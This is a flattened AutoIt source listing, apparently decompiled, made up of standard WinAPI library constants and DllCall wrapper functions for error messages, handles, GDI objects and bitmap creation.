GLOBAL CONST $EVENT_OBJECT_SELECTIONWITHIN = 32777 GLOBAL CONST $EVENT_OBJECT_STATECHANGE = 32778 GLOBAL CONST $EVENT_OBJECT_LOCATIONCHANGE = 32779 GLOBAL CONST $EVENT_OBJECT_NAMECHANGE = 32780 GLOBAL CONST $EVENT_OBJECT_DESCRIPTIONCHANGE = 32781 GLOBAL CONST $EVENT_OBJECT_VALUECHANGE = 32782 GLOBAL CONST $EVENT_OBJECT_PARENTCHANGE = 32783 GLOBAL CONST $EVENT_OBJECT_HELPCHANGE = 32784 GLOBAL CONST $EVENT_OBJECT_DEFACTIONCHANGE = 32785 GLOBAL CONST $EVENT_OBJECT_ACCELERATORCHANGE = 32786 GLOBAL CONST $EVENT_OBJECT_INVOKED = 32787 GLOBAL CONST $EVENT_OBJECT_TEXTSELECTIONCHANGED = 32788 GLOBAL CONST $EVENT_OBJECT_CONTENTSCROLLED = 32789 GLOBAL CONST $EVENT_MAX = 2147483647 GLOBAL CONST $WINEVENT_INCONTEXT = 4 GLOBAL CONST $WINEVENT_OUTOFCONTEXT = 0 GLOBAL CONST $WINEVENT_SKIPOWNPROCESS = 2 GLOBAL CONST $WINEVENT_SKIPOWNTHREAD = 1 GLOBAL CONST $TME_CANCEL = 2147483648 GLOBAL CONST $TME_HOVER = 1 GLOBAL CONST $TME_LEAVE = 2 GLOBAL CONST $TME_NONCLIENT = 16 GLOBAL CONST $TME_QUERY = 1073741824 GLOBAL CONST $DESKTOP_CREATEMENU = 4 GLOBAL CONST $DESKTOP_CREATEWINDOW = 2 GLOBAL CONST $DESKTOP_ENUMERATE = 64 GLOBAL CONST $DESKTOP_HOOKCONTROL = 8 GLOBAL CONST $DESKTOP_JOURNALPLAYBACK = 32 GLOBAL CONST 
$DESKTOP_JOURNALRECORD = 16 GLOBAL CONST $DESKTOP_READOBJECTS = 1 GLOBAL CONST $DESKTOP_SWITCHDESKTOP = 256 GLOBAL CONST $DESKTOP_WRITEOBJECTS = 128 GLOBAL CONST $DESKTOP_ALL_ACCESS = BITOR ($DESKTOP_CREATEMENU , $DESKTOP_CREATEWINDOW , $DESKTOP_ENUMERATE , $DESKTOP_HOOKCONTROL , $DESKTOP_JOURNALPLAYBACK , $DESKTOP_JOURNALRECORD , $DESKTOP_READOBJECTS , $DESKTOP_SWITCHDESKTOP , $DESKTOP_WRITEOBJECTS ) GLOBAL CONST $RIDEV_APPKEYS = 1024 GLOBAL CONST $RIDEV_CAPTUREMOUSE = 512 GLOBAL CONST $RIDEV_DEVNOTIFY = 8192 GLOBAL CONST $RIDEV_EXCLUDE = 16 GLOBAL CONST $RIDEV_EXINPUTSINK = 4096 GLOBAL CONST $RIDEV_INPUTSINK = 256 GLOBAL CONST $RIDEV_NOHOTKEYS = 512 GLOBAL CONST $RIDEV_NOLEGACY = 48 GLOBAL CONST $RIDEV_PAGEONLY = 32 GLOBAL CONST $RIDEV_REMOVE = 1 GLOBAL CONST $RID_HEADER = 268435461 GLOBAL CONST $RID_INPUT = 268435459 GLOBAL CONST $RIM_TYPEHID = 2 GLOBAL CONST $RIM_TYPEKEYBOARD = 1 GLOBAL CONST $RIM_TYPEMOUSE = 0 GLOBAL CONST $RIDI_DEVICENAME = 536870919 GLOBAL CONST $RIDI_DEVICEINFO = 536870923 GLOBAL CONST $RIDI_PREPARSEDDATA = 536870917 GLOBAL CONST $MOUSE_ATTRIBUTES_CHANGED = 4 GLOBAL CONST $MOUSE_MOVE_ABSOLUTE = 1 GLOBAL CONST $MOUSE_MOVE_RELATIVE = 0 GLOBAL CONST $MOUSE_VIRTUAL_DESKTOP = 2 GLOBAL CONST $RI_MOUSE_LEFT_BUTTON_DOWN = 1 GLOBAL CONST $RI_MOUSE_LEFT_BUTTON_UP = 2 GLOBAL CONST $RI_MOUSE_MIDDLE_BUTTON_DOWN = 16 GLOBAL CONST $RI_MOUSE_MIDDLE_BUTTON_UP = 32 GLOBAL CONST $RI_MOUSE_RIGHT_BUTTON_DOWN = 4 GLOBAL CONST $RI_MOUSE_RIGHT_BUTTON_UP = 8 GLOBAL CONST $RI_MOUSE_BUTTON_1_DOWN = $RI_MOUSE_LEFT_BUTTON_DOWN GLOBAL CONST $RI_MOUSE_BUTTON_1_UP = $RI_MOUSE_LEFT_BUTTON_UP GLOBAL CONST $RI_MOUSE_BUTTON_2_DOWN = $RI_MOUSE_RIGHT_BUTTON_DOWN GLOBAL CONST $RI_MOUSE_BUTTON_2_UP = $RI_MOUSE_RIGHT_BUTTON_UP GLOBAL CONST $RI_MOUSE_BUTTON_3_DOWN = $RI_MOUSE_MIDDLE_BUTTON_DOWN GLOBAL CONST $RI_MOUSE_BUTTON_3_UP = $RI_MOUSE_MIDDLE_BUTTON_UP GLOBAL CONST $RI_MOUSE_BUTTON_4_DOWN = 64 GLOBAL CONST $RI_MOUSE_BUTTON_4_UP = 128 GLOBAL CONST $RI_MOUSE_BUTTON_5_DOWN = 256 
GLOBAL CONST $RI_MOUSE_BUTTON_5_UP = 512 GLOBAL CONST $RI_MOUSE_WHEEL = 1024 GLOBAL CONST $RI_KEY_BREAK = 1 GLOBAL CONST $RI_KEY_E0 = 2 GLOBAL CONST $RI_KEY_E1 = 4 GLOBAL CONST $RI_KEY_MAKE = 0 #Region Global Variables and Constants GLOBAL CONST $FORMAT_MESSAGE_ALLOCATE_BUFFER = 256 GLOBAL CONST $FORMAT_MESSAGE_IGNORE_INSERTS = 512 GLOBAL CONST $FORMAT_MESSAGE_FROM_STRING = 1024 GLOBAL CONST $FORMAT_MESSAGE_FROM_HMODULE = 2048 GLOBAL CONST $FORMAT_MESSAGE_FROM_SYSTEM = 4096 GLOBAL CONST $FORMAT_MESSAGE_ARGUMENT_ARRAY = 8192 #EndRegion Global Variables and Constants FUNC _WINAPI_BEEP ($IFREQ = 500 , $IDURATION = 1000 ) LOCAL $ARESULT = DLLCALL ("kernel32.dll" , "bool" , "Beep" , "dword" , $IFREQ , "dword" , $IDURATION ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_FORMATMESSAGE ($IFLAGS , $PSOURCE , $IMESSAGEID , $ILANGUAGEID , BYREF $PBUFFER , $ISIZE , $VARGUMENTS ) LOCAL $SBUFFERTYPE = "struct*" IF ISSTRING ($PBUFFER ) THEN $SBUFFERTYPE = "wstr" LOCAL $ARESULT = DLLCALL ("kernel32.dll" , "dword" , "FormatMessageW" , "dword" , $IFLAGS , "struct*" , $PSOURCE , "dword" , $IMESSAGEID , "dword" , $ILANGUAGEID , $SBUFFERTYPE , $PBUFFER , "dword" , $ISIZE , "ptr" , $VARGUMENTS ) IF @ERROR OR NOT $ARESULT [0 ] THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , 0 ) IF $SBUFFERTYPE = "wstr" THEN $PBUFFER = $ARESULT [5 ] RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_GETERRORMESSAGE ($ICODE , $ILANGUAGE = 0 , CONST $_ICURRENTERROR = @ERROR , CONST $_ICURRENTEXTENDED = @EXTENDED ) LOCAL $ARET = DLLCALL ("kernel32.dll" , "dword" , "FormatMessageW" , "dword" , 4096 , "ptr" , 0 , "dword" , $ICODE , "dword" , $ILANGUAGE , "wstr" , "" , "dword" , 4096 , "ptr" , 0 ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR , @EXTENDED , "" ) RETURN SETERROR ($_ICURRENTERROR , $_ICURRENTEXTENDED , STRINGREGEXPREPLACE ($ARET [5 ] , "[" & @LF & "," & @CR & "]*\Z" , "" ) ) ENDFUNC FUNC _WINAPI_GETLASTERROR (CONST $_ICURRENTERROR = @ERROR 
, CONST $_ICURRENTEXTENDED = @EXTENDED ) LOCAL $ARESULT = DLLCALL ("kernel32.dll" , "dword" , "GetLastError" ) RETURN SETERROR ($_ICURRENTERROR , $_ICURRENTEXTENDED , $ARESULT [0 ] ) ENDFUNC FUNC _WINAPI_GETLASTERRORMESSAGE (CONST $_ICURRENTERROR = @ERROR , CONST $_ICURRENTEXTENDED = @EXTENDED ) LOCAL $ILASTERROR = _WINAPI_GETLASTERROR () LOCAL $TBUFFERPTR = DLLSTRUCTCREATE ("ptr" ) LOCAL $NCOUNT = _WINAPI_FORMATMESSAGE (BITOR ($FORMAT_MESSAGE_ALLOCATE_BUFFER , $FORMAT_MESSAGE_FROM_SYSTEM ) , 0 , $ILASTERROR , 0 , $TBUFFERPTR , 0 , 0 ) IF @ERROR THEN RETURN SETERROR (- @ERROR , @EXTENDED , "" ) LOCAL $STEXT = "" LOCAL $PBUFFER = DLLSTRUCTGETDATA ($TBUFFERPTR , 1 ) IF $PBUFFER THEN IF $NCOUNT > 0 THEN LOCAL $TBUFFER = DLLSTRUCTCREATE ("wchar[" & ($NCOUNT + 1 ) & "]" , $PBUFFER ) $STEXT = DLLSTRUCTGETDATA ($TBUFFER , 1 ) IF STRINGRIGHT ($STEXT , 2 ) = @CRLF THEN $STEXT = STRINGTRIMRIGHT ($STEXT , 2 ) ENDIF DLLCALL ("kernel32.dll" , "handle" , "LocalFree" , "handle" , $PBUFFER ) ENDIF RETURN SETERROR ($_ICURRENTERROR , $_ICURRENTEXTENDED , $STEXT ) ENDFUNC FUNC _WINAPI_MESSAGEBEEP ($ITYPE = 1 ) LOCAL $ISOUND SWITCH $ITYPE CASE 1 $ISOUND = 0 CASE 2 $ISOUND = 16 CASE 3 $ISOUND = 32 CASE 4 $ISOUND = 48 CASE 5 $ISOUND = 64 CASE ELSE $ISOUND = + 4294967295 ENDSWITCH LOCAL $ARESULT = DLLCALL ("user32.dll" , "bool" , "MessageBeep" , "uint" , $ISOUND ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_MSGBOX ($IFLAGS , $STITLE , $STEXT ) BLOCKINPUT (0 ) MSGBOX ($IFLAGS , $STITLE , $STEXT & " " ) ENDFUNC FUNC _WINAPI_SETLASTERROR ($IERRORCODE , CONST $_ICURRENTERROR = @ERROR , CONST $_ICURRENTEXTENDED = @EXTENDED ) DLLCALL ("kernel32.dll" , "none" , "SetLastError" , "dword" , $IERRORCODE ) RETURN SETERROR ($_ICURRENTERROR , $_ICURRENTEXTENDED , NULL ) ENDFUNC FUNC _WINAPI_SHOWERROR ($STEXT , $BEXIT = TRUE ) BLOCKINPUT (0 ) MSGBOX ($MB_SYSTEMMODAL , "Error" , $STEXT & " " ) IF $BEXIT THEN EXIT ENDFUNC FUNC 
_WINAPI_SHOWLASTERROR ($STEXT = "" , $BABORT = FALSE , $ILANGUAGE = 0 , CONST $_ICURRENTERROR = @ERROR , CONST $_ICURRENTEXTENDED = @EXTENDED ) LOCAL $SERROR LOCAL $ILASTERROR = _WINAPI_GETLASTERROR () WHILE 1 $SERROR = _WINAPI_GETERRORMESSAGE ($ILASTERROR , $ILANGUAGE ) IF @ERROR AND $ILANGUAGE THEN $ILANGUAGE = 0 ELSE EXITLOOP ENDIF WEND IF STRINGSTRIPWS ($STEXT , $STR_STRIPLEADING + $STR_STRIPTRAILING ) THEN $STEXT &= @CRLF & @CRLF ELSE $STEXT = "" ENDIF _WINAPI_MSGBOX (BITOR (262144 , BITSHIFT (16 , + 4294967294 * (NOT $ILASTERROR ) ) ) , $ILASTERROR , $STEXT & $SERROR ) IF $ILASTERROR THEN _WINAPI_SETLASTERROR ($ILASTERROR ) IF $BABORT THEN EXIT $ILASTERROR ENDIF ENDIF RETURN SETERROR ($_ICURRENTERROR , $_ICURRENTEXTENDED , 1 ) ENDFUNC FUNC _WINAPI_SHOWMSG ($STEXT ) _WINAPI_MSGBOX ($MB_SYSTEMMODAL , "Information" , $STEXT ) ENDFUNC FUNC __COMERRORFORMATING (BYREF $OCOMERROR , $SPREFIX = @TAB ) LOCAL CONST $STR_STRIPTRAILING = 2 LOCAL $SERROR = "COM Error encountered in " & @SCRIPTNAME & " (" & $OCOMERROR.Scriptline & ") :" & @CRLF & $SPREFIX & "Number " & @TAB & "= 0x" & HEX ($OCOMERROR.Number , 8 ) & " (" & $OCOMERROR.Number & ")" & @CRLF & $SPREFIX & "WinDescription" & @TAB & "= " & STRINGSTRIPWS ($OCOMERROR.WinDescription , $STR_STRIPTRAILING ) & @CRLF & $SPREFIX & "Description " & @TAB & "= " & STRINGSTRIPWS ($OCOMERROR.Description , $STR_STRIPTRAILING ) & @CRLF & $SPREFIX & "Source " & @TAB & "= " & $OCOMERROR.Source & @CRLF & $SPREFIX & "HelpFile " & @TAB & "= " & $OCOMERROR.HelpFile & @CRLF & $SPREFIX & "HelpContext " & @TAB & "= " & $OCOMERROR.HelpContext & @CRLF & $SPREFIX & "LastDllError " & @TAB & "= " & $OCOMERROR.LastDllError & @CRLF & $SPREFIX & "Retcode " & @TAB & "= 0x" & HEX ($OCOMERROR.retcode ) RETURN $SERROR ENDFUNC #Region Global Variables and Constants GLOBAL CONST $DUPLICATE_CLOSE_SOURCE = 1 GLOBAL CONST $DUPLICATE_SAME_ACCESS = 2 GLOBAL CONST $OBJ_BITMAP = 7 GLOBAL CONST $OBJ_BRUSH = 2 GLOBAL CONST $OBJ_COLORSPACE = 14 GLOBAL CONST 
$OBJ_DC = 3 GLOBAL CONST $OBJ_ENHMETADC = 12 GLOBAL CONST $OBJ_ENHMETAFILE = 13 GLOBAL CONST $OBJ_EXTPEN = 11 GLOBAL CONST $OBJ_FONT = 6 GLOBAL CONST $OBJ_MEMDC = 10 GLOBAL CONST $OBJ_METADC = 4 GLOBAL CONST $OBJ_METAFILE = 9 GLOBAL CONST $OBJ_PAL = 5 GLOBAL CONST $OBJ_PEN = 1 GLOBAL CONST $OBJ_REGION = 8 GLOBAL CONST $NULL_BRUSH = 5 GLOBAL CONST $NULL_PEN = 8 GLOBAL CONST $BLACK_BRUSH = 4 GLOBAL CONST $DKGRAY_BRUSH = 3 GLOBAL CONST $DC_BRUSH = 18 GLOBAL CONST $GRAY_BRUSH = 2 GLOBAL CONST $HOLLOW_BRUSH = $NULL_BRUSH GLOBAL CONST $LTGRAY_BRUSH = 1 GLOBAL CONST $WHITE_BRUSH = 0 GLOBAL CONST $BLACK_PEN = 7 GLOBAL CONST $DC_PEN = 19 GLOBAL CONST $WHITE_PEN = 6 GLOBAL CONST $ANSI_FIXED_FONT = 11 GLOBAL CONST $ANSI_VAR_FONT = 12 GLOBAL CONST $DEVICE_DEFAULT_FONT = 14 GLOBAL CONST $DEFAULT_GUI_FONT = 17 GLOBAL CONST $OEM_FIXED_FONT = 10 GLOBAL CONST $SYSTEM_FONT = 13 GLOBAL CONST $SYSTEM_FIXED_FONT = 16 GLOBAL CONST $DEFAULT_PALETTE = 15 #EndRegion Global Variables and Constants #Region Functions list #EndRegion Functions list #Region Public Functions FUNC _WINAPI_CLOSEHANDLE ($HOBJECT ) LOCAL $ARESULT = DLLCALL ("kernel32.dll" , "bool" , "CloseHandle" , "handle" , $HOBJECT ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_DELETEOBJECT ($HOBJECT ) LOCAL $ARESULT = DLLCALL ("gdi32.dll" , "bool" , "DeleteObject" , "handle" , $HOBJECT ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_DUPLICATEHANDLE ($HSOURCEPROCESSHANDLE , $HSOURCEHANDLE , $HTARGETPROCESSHANDLE , $IDESIREDACCESS , $IINHERITHANDLE , $IOPTIONS ) LOCAL $ARESULT = DLLCALL ("kernel32.dll" , "bool" , "DuplicateHandle" , "handle" , $HSOURCEPROCESSHANDLE , "handle" , $HSOURCEHANDLE , "handle" , $HTARGETPROCESSHANDLE , "handle*" , 0 , "dword" , $IDESIREDACCESS , "bool" , $IINHERITHANDLE , "dword" , $IOPTIONS ) IF @ERROR OR NOT $ARESULT [0 ] THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARESULT [4 ] 
ENDFUNC FUNC _WINAPI_GETCURRENTOBJECT ($HDC , $ITYPE ) LOCAL $ARET = DLLCALL ("gdi32.dll" , "handle" , "GetCurrentObject" , "handle" , $HDC , "uint" , $ITYPE ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_GETCURRENTPROCESS () LOCAL $ARESULT = DLLCALL ("kernel32.dll" , "handle" , "GetCurrentProcess" ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_GETOBJECT ($HOBJECT , $ISIZE , $POBJECT ) LOCAL $ARESULT = DLLCALL ("gdi32.dll" , "int" , "GetObjectW" , "handle" , $HOBJECT , "int" , $ISIZE , "struct*" , $POBJECT ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_GETOBJECTINFOBYHANDLE ($HOBJECT ) LOCAL $TAGPUBLIC_OBJECT_BASIC_INFORMATION = "ulong Attributes;ulong GrantedAcess;ulong HandleCount;ulong PointerCount;ulong Reserved[10]" LOCAL $TPOBI = DLLSTRUCTCREATE ($TAGPUBLIC_OBJECT_BASIC_INFORMATION ) LOCAL $ARET = DLLCALL ("ntdll.dll" , "long" , "ZwQueryObject" , "handle" , $HOBJECT , "uint" , 0 , "struct*" , $TPOBI , "ulong" , DLLSTRUCTGETSIZE ($TPOBI ) , "ptr" , 0 ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) IF $ARET [0 ] THEN RETURN SETERROR (10 , $ARET [0 ] , 0 ) LOCAL $ARESULT [4 ] FOR $I = 0 TO 3 $ARESULT [$I ] = DLLSTRUCTGETDATA ($TPOBI , $I + 1 ) NEXT RETURN $ARESULT ENDFUNC FUNC _WINAPI_GETOBJECTNAMEBYHANDLE ($HOBJECT ) LOCAL $TAGUNICODE_STRING = "struct;ushort Length;ushort MaximumLength;ptr Buffer;endstruct" LOCAL $TAGPUBLIC_OBJECT_TYPE_INFORMATION = "struct;" & $TAGUNICODE_STRING & ";ulong Reserved[22];endstruct" LOCAL $TPOTI = DLLSTRUCTCREATE ($TAGPUBLIC_OBJECT_TYPE_INFORMATION & ";byte[32]" ) LOCAL $ARET = DLLCALL ("ntdll.dll" , "long" , "ZwQueryObject" , "handle" , $HOBJECT , "uint" , 2 , "struct*" , $TPOTI , "ulong" , DLLSTRUCTGETSIZE ($TPOTI ) , "ulong*" , 0 ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , "" ) IF $ARET [0 ] THEN RETURN SETERROR (10 , $ARET [0 ] , 
"" ) LOCAL $PDATA = DLLSTRUCTGETDATA ($TPOTI , 3 ) IF NOT $PDATA THEN RETURN SETERROR (11 , 0 , "" ) RETURN _WINAPI_GETSTRING ($PDATA ) ENDFUNC FUNC _WINAPI_GETOBJECTTYPE ($HOBJECT ) LOCAL $ARET = DLLCALL ("gdi32.dll" , "dword" , "GetObjectType" , "handle" , $HOBJECT ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_GETSTDHANDLE ($ISTDHANDLE ) IF $ISTDHANDLE < 0 OR $ISTDHANDLE > 2 THEN RETURN SETERROR (2 , 0 , + 4294967295 ) LOCAL CONST $AHANDLE [3 ] = [+ 4294967286 , + 4294967285 , + 4294967284 ] LOCAL $ARESULT = DLLCALL ("kernel32.dll" , "handle" , "GetStdHandle" , "dword" , $AHANDLE [$ISTDHANDLE ] ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , + 4294967295 ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_GETSTOCKOBJECT ($IOBJECT ) LOCAL $ARESULT = DLLCALL ("gdi32.dll" , "handle" , "GetStockObject" , "int" , $IOBJECT ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_SELECTOBJECT ($HDC , $HGDIOBJ ) LOCAL $ARESULT = DLLCALL ("gdi32.dll" , "handle" , "SelectObject" , "handle" , $HDC , "handle" , $HGDIOBJ ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_SETHANDLEINFORMATION ($HOBJECT , $IMASK , $IFLAGS ) LOCAL $ARESULT = DLLCALL ("kernel32.dll" , "bool" , "SetHandleInformation" , "handle" , $HOBJECT , "dword" , $IMASK , "dword" , $IFLAGS ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARESULT [0 ] ENDFUNC #EndRegion Public Functions #Region Global Variables and Constants GLOBAL CONST $TAGBITMAP = "struct;long bmType;long bmWidth;long bmHeight;long bmWidthBytes;ushort bmPlanes;ushort bmBitsPixel;ptr bmBits;endstruct" GLOBAL CONST $TAGBITMAPV5HEADER = "struct;dword bV5Size;long bV5Width;long bV5Height;ushort bV5Planes;ushort bV5BitCount;dword bV5Compression;dword bV5SizeImage;long bV5XPelsPerMeter;long bV5YPelsPerMeter;dword bV5ClrUsed;dword bV5ClrImportant;dword bV5RedMask;dword 
bV5GreenMask;dword bV5BlueMask;dword bV5AlphaMask;dword bV5CSType;int bV5Endpoints[9];dword bV5GammaRed;dword bV5GammaGreen;dword bV5GammaBlue;dword bV5Intent;dword bV5ProfileData;dword bV5ProfileSize;dword bV5Reserved;endstruct" GLOBAL CONST $TAGDIBSECTION = $TAGBITMAP & ";" & $TAGBITMAPINFOHEADER & ";dword dsBitfields[3];ptr dshSection;dword dsOffset" GLOBAL CONST $TMPF_FIXED_PITCH = 1 GLOBAL CONST $TMPF_VECTOR = 2 GLOBAL CONST $TMPF_TRUETYPE = 4 GLOBAL CONST $TMPF_DEVICE = 8 GLOBAL CONST $__WINAPICONSTANT_FW_NORMAL = 400 GLOBAL CONST $__WINAPICONSTANT_DEFAULT_CHARSET = 1 GLOBAL CONST $__WINAPICONSTANT_OUT_DEFAULT_PRECIS = 0 GLOBAL CONST $__WINAPICONSTANT_CLIP_DEFAULT_PRECIS = 0 GLOBAL CONST $__WINAPICONSTANT_DEFAULT_QUALITY = 0 #EndRegion Global Variables and Constants #Region Functions list #EndRegion Functions list #Region Public Functions FUNC _WINAPI_BITBLT ($HDESTDC , $IXDEST , $IYDEST , $IWIDTH , $IHEIGHT , $HSRCDC , $IXSRC , $IYSRC , $IROP ) LOCAL $ARESULT = DLLCALL ("gdi32.dll" , "bool" , "BitBlt" , "handle" , $HDESTDC , "int" , $IXDEST , "int" , $IYDEST , "int" , $IWIDTH , "int" , $IHEIGHT , "handle" , $HSRCDC , "int" , $IXSRC , "int" , $IYSRC , "dword" , $IROP ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_COMBINERGN ($HRGNDEST , $HRGNSRC1 , $HRGNSRC2 , $ICOMBINEMODE ) LOCAL $ARESULT = DLLCALL ("gdi32.dll" , "int" , "CombineRgn" , "handle" , $HRGNDEST , "handle" , $HRGNSRC1 , "handle" , $HRGNSRC2 , "int" , $ICOMBINEMODE ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_COPYBITMAP ($HBITMAP ) $HBITMAP = _WINAPI_COPYIMAGE ($HBITMAP , 0 , 0 , 0 , 8192 ) RETURN SETERROR (@ERROR , @EXTENDED , $HBITMAP ) ENDFUNC FUNC _WINAPI_COPYIMAGE ($HIMAGE , $ITYPE = 0 , $IXDESIREDPIXELS = 0 , $IYDESIREDPIXELS = 0 , $IFLAGS = 0 ) LOCAL $ARET = DLLCALL ("user32.dll" , "handle" , "CopyImage" , "handle" , $HIMAGE , "uint" , $ITYPE , "int" , $IXDESIREDPIXELS , "int" , 
$IYDESIREDPIXELS , "uint" , $IFLAGS ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_CREATEANDBITMAP ($HBITMAP ) LOCAL $IERROR = 0 , $HDIB = 0 $HBITMAP = _WINAPI_COPYBITMAP ($HBITMAP ) IF NOT $HBITMAP THEN RETURN SETERROR (@ERROR + 20 , @EXTENDED , 0 ) DO LOCAL $ATDIB [2 ] $ATDIB [0 ] = DLLSTRUCTCREATE ($TAGDIBSECTION ) IF (NOT _WINAPI_GETOBJECT ($HBITMAP , DLLSTRUCTGETSIZE ($ATDIB [0 ] ) , $ATDIB [0 ] ) ) OR (DLLSTRUCTGETDATA ($ATDIB [0 ] , "bmBitsPixel" ) <> 32 ) OR (DLLSTRUCTGETDATA ($ATDIB [0 ] , "biCompression" ) ) THEN $IERROR = 10 EXITLOOP ENDIF $ATDIB [1 ] = DLLSTRUCTCREATE ($TAGBITMAP ) $HDIB = _WINAPI_CREATEDIB (DLLSTRUCTGETDATA ($ATDIB [0 ] , "bmWidth" ) , DLLSTRUCTGETDATA ($ATDIB [0 ] , "bmHeight" ) , 1 ) IF NOT _WINAPI_GETOBJECT ($HDIB , DLLSTRUCTGETSIZE ($ATDIB [1 ] ) , $ATDIB [1 ] ) THEN $IERROR = 11 EXITLOOP ENDIF LOCAL $ARET = DLLCALL ("user32.dll" , "lresult" , "CallWindowProc" , "ptr" , __ANDPROC () , "ptr" , 0 , "uint" , 0 , "wparam" , DLLSTRUCTGETPTR ($ATDIB [0 ] ) , "lparam" , DLLSTRUCTGETPTR ($ATDIB [1 ] ) ) IF @ERROR THEN $IERROR = @ERROR EXITLOOP ENDIF IF NOT $ARET [0 ] THEN $IERROR = 12 EXITLOOP ENDIF $IERROR = 0 UNTIL 1 _WINAPI_DELETEOBJECT ($HBITMAP ) IF $IERROR THEN IF $HDIB THEN _WINAPI_DELETEOBJECT ($HDIB ) ENDIF $HDIB = 0 ENDIF RETURN SETERROR ($IERROR , 0 , $HDIB ) ENDFUNC FUNC _WINAPI_CREATEBITMAP ($IWIDTH , $IHEIGHT , $IPLANES = 1 , $IBITSPERPEL = 1 , $PBITS = 0 ) LOCAL $ARESULT = DLLCALL ("gdi32.dll" , "handle" , "CreateBitmap" , "int" , $IWIDTH , "int" , $IHEIGHT , "uint" , $IPLANES , "uint" , $IBITSPERPEL , "struct*" , $PBITS ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_CREATECOMPATIBLEBITMAP ($HDC , $IWIDTH , $IHEIGHT ) LOCAL $ARESULT = DLLCALL ("gdi32.dll" , "handle" , "CreateCompatibleBitmap" , "handle" , $HDC , "int" , $IWIDTH , "int" , $IHEIGHT ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARESULT 
[0 ] ENDFUNC FUNC _WINAPI_CREATEDIB ($IWIDTH , $IHEIGHT , $IBITSPERPEL = 32 , $TCOLORTABLE = 0 , $ICOLORCOUNT = 0 ) LOCAL $ARGBQ [2 ] , $ICOLORS , $TAGRGBQ SWITCH $IBITSPERPEL CASE 1 $ICOLORS = 2 CASE 4 $ICOLORS = 16 CASE 8 $ICOLORS = 256 CASE ELSE $ICOLORS = 0 ENDSWITCH IF $ICOLORS THEN IF NOT ISDLLSTRUCT ($TCOLORTABLE ) THEN SWITCH $IBITSPERPEL CASE 1 $ARGBQ [0 ] = 0 $ARGBQ [1 ] = 16777215 $TCOLORTABLE = _WINAPI_CREATEDIBCOLORTABLE ($ARGBQ ) CASE ELSE ENDSWITCH ELSE IF $ICOLORS > $ICOLORCOUNT THEN $ICOLORS = $ICOLORCOUNT ENDIF IF (NOT $ICOLORS ) OR ((4 * $ICOLORS ) > DLLSTRUCTGETSIZE ($TCOLORTABLE ) ) THEN RETURN SETERROR (20 , 0 , 0 ) ENDIF ENDIF $TAGRGBQ = ";dword aRGBQuad[" & $ICOLORS & "]" ELSE $TAGRGBQ = "" ENDIF LOCAL $TBITMAPINFO = DLLSTRUCTCREATE ($TAGBITMAPINFOHEADER & $TAGRGBQ ) DLLSTRUCTSETDATA ($TBITMAPINFO , "biSize" , 40 ) DLLSTRUCTSETDATA ($TBITMAPINFO , "biWidth" , $IWIDTH ) DLLSTRUCTSETDATA ($TBITMAPINFO , "biHeight" , $IHEIGHT ) DLLSTRUCTSETDATA ($TBITMAPINFO , "biPlanes" , 1 ) DLLSTRUCTSETDATA ($TBITMAPINFO , "biBitCount" , $IBITSPERPEL ) DLLSTRUCTSETDATA ($TBITMAPINFO , "biCompression" , 0 ) DLLSTRUCTSETDATA ($TBITMAPINFO , "biSizeImage" , 0 ) DLLSTRUCTSETDATA ($TBITMAPINFO , "biXPelsPerMeter" , 0 ) DLLSTRUCTSETDATA ($TBITMAPINFO , "biYPelsPerMeter" , 0 ) DLLSTRUCTSETDATA ($TBITMAPINFO , "biClrUsed" , $ICOLORS ) DLLSTRUCTSETDATA ($TBITMAPINFO , "biClrImportant" , 0 ) IF $ICOLORS THEN IF ISDLLSTRUCT ($TCOLORTABLE ) THEN _WINAPI_MOVEMEMORY (DLLSTRUCTGETPTR ($TBITMAPINFO , "aRGBQuad" ) , $TCOLORTABLE , 4 * $ICOLORS ) ELSE _WINAPI_ZEROMEMORY (DLLSTRUCTGETPTR ($TBITMAPINFO , "aRGBQuad" ) , 4 * $ICOLORS ) ENDIF 